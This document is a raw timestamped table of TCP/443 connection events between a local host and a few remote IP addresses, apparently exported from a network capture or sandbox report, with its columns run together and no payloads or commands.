                                                                        Dec 3, 2024 17:50:39.791469097 CET49813443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:39.791649103 CET49813443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:39.791657925 CET4434981313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:39.832375050 CET4434980813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:39.832463026 CET4434980813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:39.832631111 CET49808443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:39.832871914 CET49808443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:39.832887888 CET4434980813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:39.832904100 CET49808443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:39.832909107 CET4434980813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:39.835877895 CET49814443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:39.835925102 CET4434981413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:39.836008072 CET49814443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:39.836155891 CET49814443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:39.836167097 CET4434981413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:39.907803059 CET4434981213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:39.908466101 CET49812443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:39.908493042 CET4434981213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:39.908924103 CET49812443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:39.908927917 CET4434981213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:39.961754084 CET4434981113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:39.961817980 CET4434981113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:39.961905003 CET49811443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:39.962136984 CET49811443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:39.962153912 CET4434981113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:39.962163925 CET49811443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:39.962168932 CET4434981113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:39.965189934 CET49815443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:39.965224981 CET4434981513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:39.965311050 CET49815443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:39.965507984 CET49815443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:39.965517044 CET4434981513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:40.035412073 CET4434981013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:40.035496950 CET4434981013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:40.035568953 CET49810443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:40.035749912 CET49810443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:40.035749912 CET49810443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:40.035798073 CET4434981013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:40.035825014 CET4434981013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:40.038783073 CET49816443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:40.038825035 CET4434981613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:40.038918018 CET49816443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:40.039077044 CET49816443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:40.039097071 CET4434981613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:40.345319033 CET4434981213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:40.345398903 CET4434981213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:40.345458984 CET49812443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:40.345670938 CET49812443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:40.345691919 CET4434981213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:40.345702887 CET49812443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:40.345709085 CET4434981213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:40.348866940 CET49817443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:40.348915100 CET4434981713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:40.348992109 CET49817443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:40.349143982 CET49817443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:40.349159956 CET4434981713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:41.564820051 CET4434981413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:41.565489054 CET49814443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:41.565519094 CET4434981413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:41.566008091 CET49814443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:41.566014051 CET4434981413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:41.585324049 CET4434981313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:41.585699081 CET49813443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:41.585725069 CET4434981313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:41.586116076 CET49813443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:41.586122036 CET4434981313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:41.764523029 CET4434981613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:41.765207052 CET49816443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:41.765247107 CET4434981613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:41.765460014 CET4434981513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:41.765724897 CET49815443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:41.765741110 CET4434981513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:41.765840054 CET49816443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:41.765853882 CET4434981613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:41.766172886 CET49815443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:41.766176939 CET4434981513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.000699997 CET4434981413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.000777960 CET4434981413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.000840902 CET49814443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.001054049 CET49814443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.001075029 CET4434981413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.001086950 CET49814443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.001092911 CET4434981413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.004147053 CET49818443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.004196882 CET4434981813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.004287958 CET49818443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.004465103 CET49818443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.004479885 CET4434981813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.030390978 CET4434981313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.030473948 CET4434981313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.030551910 CET49813443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.030801058 CET49813443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.030817032 CET4434981313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.030827045 CET49813443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.030832052 CET4434981313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.034146070 CET49819443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.034192085 CET4434981913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.034281015 CET49819443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.034456968 CET49819443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.034465075 CET4434981913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.208848953 CET4434981713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.209572077 CET49817443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.209625006 CET4434981713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.210180998 CET49817443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.210187912 CET4434981713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.224050045 CET4434981613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.224134922 CET4434981613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.224221945 CET49816443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.224473000 CET49816443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.224473000 CET49816443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.224490881 CET4434981613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.224499941 CET4434981613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.225593090 CET4434981513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.225658894 CET4434981513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.225712061 CET49815443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.225814104 CET49815443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.225826979 CET4434981513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.225838900 CET49815443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.225845098 CET4434981513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.227118015 CET49820443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.227150917 CET4434982013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.227242947 CET49820443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.227371931 CET49820443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.227385998 CET4434982013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.228009939 CET49821443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.228060007 CET4434982113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.228120089 CET49821443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.228259087 CET49821443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.228276014 CET4434982113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.664315939 CET4434981713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.664395094 CET4434981713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.664477110 CET49817443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.664679050 CET49817443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.664702892 CET4434981713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.664715052 CET49817443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.664721012 CET4434981713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.667680025 CET49822443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.667725086 CET4434982213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:42.667797089 CET49822443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.667932034 CET49822443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:42.667944908 CET4434982213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:43.203063011 CET44349797142.250.181.100192.168.2.4
                                                                        Dec 3, 2024 17:50:43.203140974 CET44349797142.250.181.100192.168.2.4
                                                                        Dec 3, 2024 17:50:43.203193903 CET49797443192.168.2.4142.250.181.100
                                                                        Dec 3, 2024 17:50:43.603254080 CET49797443192.168.2.4142.250.181.100
                                                                        Dec 3, 2024 17:50:43.603291035 CET44349797142.250.181.100192.168.2.4
                                                                        Dec 3, 2024 17:50:44.140311003 CET4434981813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.141500950 CET49818443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.141527891 CET4434981813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.142824888 CET49818443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.142832041 CET4434981813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.144695044 CET4434981913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.145560026 CET49819443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.145587921 CET4434981913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.146835089 CET49819443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.146846056 CET4434981913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.161016941 CET4434982113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.161748886 CET49821443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.161777973 CET4434982113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.163027048 CET49821443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.163032055 CET4434982113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.183942080 CET4434982013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.184801102 CET49820443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.184819937 CET4434982013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.185256004 CET49820443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.185261965 CET4434982013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.588551044 CET4434981813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.588624954 CET4434981813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.588680029 CET49818443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.588891983 CET49818443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.588912964 CET4434981813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.588924885 CET49818443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.588932991 CET4434981813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.591917038 CET49823443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.591964006 CET4434982313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.592063904 CET49823443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.592232943 CET49823443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.592247009 CET4434982313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.602416039 CET4434982113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.602483034 CET4434982113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.602546930 CET49821443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.602684021 CET49821443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.602694035 CET4434982113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.602718115 CET49821443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.602722883 CET4434982113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.604962111 CET49824443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.605084896 CET4434982413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.605170965 CET49824443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.605320930 CET49824443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.605355978 CET4434982413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.605555058 CET4434981913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.605715036 CET4434981913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.605766058 CET49819443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.605796099 CET49819443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.605814934 CET4434981913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.605824947 CET49819443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.605830908 CET4434981913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.607789993 CET49825443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.607829094 CET4434982513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.607912064 CET49825443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.608030081 CET49825443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.608047962 CET4434982513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.631411076 CET4434982013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.631596088 CET4434982013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.631680012 CET49820443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.631813049 CET49820443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.631834984 CET4434982013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.631849051 CET49820443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.631855965 CET4434982013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.633919001 CET49826443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.633990049 CET4434982613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.634083986 CET49826443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.634222984 CET49826443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.634268999 CET4434982613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.681406975 CET4434982213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.681864977 CET49822443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.681879044 CET4434982213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:44.682394028 CET49822443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:44.682399988 CET4434982213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:45.150769949 CET4434982213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:45.150860071 CET4434982213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:45.150930882 CET49822443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:45.151170015 CET49822443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:45.151190042 CET4434982213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:45.151201963 CET49822443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:45.151209116 CET4434982213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:45.154213905 CET49827443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:45.154268026 CET4434982713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:45.154359102 CET49827443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:45.154556036 CET49827443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:45.154566050 CET4434982713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.338958025 CET4434982313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.339679003 CET49823443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.339715004 CET4434982313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.340049982 CET49823443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.340054035 CET4434982313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.406389952 CET4434982413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.406878948 CET49824443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.406907082 CET4434982413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.407325983 CET49824443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.407330036 CET4434982413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.448168039 CET4434982513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.448246956 CET4434982613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.448743105 CET49825443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.448765993 CET4434982513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.448956013 CET49826443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.448971033 CET4434982613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.449064016 CET49825443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.449069023 CET4434982513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.449424028 CET49826443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.449428082 CET4434982613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.808695078 CET4434982313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.808875084 CET4434982313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.808979034 CET49823443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.809020042 CET49823443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.809039116 CET4434982313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.809055090 CET49823443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.809060097 CET4434982313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.811557055 CET49828443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.811608076 CET4434982813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.811686993 CET49828443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.811852932 CET49828443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.811866999 CET4434982813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.819221973 CET4434982713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.823303938 CET49827443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.823344946 CET4434982713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.823770046 CET49827443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.823779106 CET4434982713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.855362892 CET4434982413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.855458021 CET4434982413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.855703115 CET49824443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.855748892 CET49824443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.855768919 CET4434982413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.855782986 CET49824443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.855787992 CET4434982413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.858453035 CET49829443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.858488083 CET4434982913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.858556032 CET49829443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.858704090 CET49829443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.858717918 CET4434982913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.901345015 CET4434982513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.901415110 CET4434982513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.901659012 CET49825443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.901700974 CET49825443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.901700974 CET49825443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.901724100 CET4434982513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.901732922 CET4434982513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.902908087 CET4434982613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.902971983 CET4434982613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.903017998 CET49826443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.903124094 CET49826443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.903135061 CET4434982613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.903151035 CET49826443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.903156042 CET4434982613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.904414892 CET49830443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.904468060 CET4434983013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.905004978 CET49831443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.905030012 CET4434983113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.905049086 CET49830443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.905078888 CET49831443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.905213118 CET49830443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.905225039 CET4434983013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:46.905255079 CET49831443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:46.905262947 CET4434983113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:47.263748884 CET4434982713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:47.263837099 CET4434982713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:47.263926029 CET49827443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:47.264105082 CET49827443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:47.264127016 CET4434982713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:47.264138937 CET49827443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:47.264143944 CET4434982713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:47.270967007 CET49832443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:47.271014929 CET4434983213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:47.271897078 CET49832443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:47.271897078 CET49832443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:47.271924019 CET4434983213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:48.588422060 CET4434982913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:48.588937998 CET49829443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:48.588960886 CET4434982913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:48.589433908 CET49829443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:48.589445114 CET4434982913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:48.611154079 CET4434982813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:48.611676931 CET49828443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:48.611717939 CET4434982813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:48.612104893 CET49828443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:48.612111092 CET4434982813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:48.725466013 CET4434983013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:48.725686073 CET4434983113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:48.726017952 CET49830443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:48.726047039 CET4434983013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:48.726105928 CET49831443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:48.726118088 CET4434983113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:48.726533890 CET49830443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:48.726538897 CET4434983013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:48.726568937 CET49831443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:48.726574898 CET4434983113.107.246.63192.168.2.4
